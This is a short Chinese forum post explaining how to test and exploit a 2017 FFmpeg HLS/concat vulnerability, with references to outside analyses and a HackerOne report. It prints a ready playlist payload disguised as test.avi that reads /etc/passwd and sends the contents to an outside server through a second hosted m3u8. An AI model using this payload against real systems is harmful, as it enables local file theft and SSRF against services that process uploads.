HACK80 首页  立即注册  登录
现在注册
已注册用户请  登录
HACK80    技术交流

FFmpeg文件读取漏洞测试及利用

  •   @w=无名 ·2017-10-12 13:58:59·244 次点击 ·阅读模式     
    经历过
    ImageMagick命令执行漏洞的洗礼之后,又有FFmpeg文件读取漏洞,真是很激情。
    看了老外写的文章,大概理解的利用方式如下:
    #EXTM3U#EXT-X-MEDIA-SEQUENCE:0#EXTINF:10.0,concat:http://www.secpulse.com/header.m3u8|file:///etc/passwd#EXT-X-ENDLIST
    以上内容保存成test.avi,是用来上传到被攻击服务器的。
    #EXTM3U#EXT-X-MEDIA-SEQUENCE:0#EXTINF:,http://www.secpulse.com?
    以上内容保存成header.m3u8,将header.m3u8上传到你的服务器,然后把test.avi上传到攻击服务器,如果有漏洞,会收到如下的日志:
    会收到三条日志记录,第一条是请求header.m3u8文件的,第三条中就包含了读取的部分文件内容,说明是存在此漏洞的。
    header.m3u8文件的内容大概是将让你的web产生日志并且传回读取的文件内容。
    这个漏洞可以用来本地文件读取(返回部分内容)和SSRF。

    具体的参考老外写的分析文章:
    https://habrahabr.ru/company/mailru/blog/274855/
    还有ffmpeg的说明文档:
    https://www.ffmpeg.org/ffmpeg-protocols.html#concat
    还有hackerone的漏洞报告
    SSRF and local file read in video to gif converter


    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?立即注册

    x
    244 次点击  
    收藏  转播  分享
    添加一条新回复
    您需要登录后才可以回帖 登录 | 立即注册

    本节点积分规则
    QQ
    小黑屋   ·   手机版   ·   228 人在线 最高记录 5500   ·   TOP
    我们很年轻,但我们有信念、有梦想!

      我们坚信只有今天付出了,才有机会看到明天的太阳!现在!加入我们,给你一个气氛优秀的技术圈子。  
    GMT+8, 2018-7-23 06:28, Processed in 0.043525 second(s), 20 queries .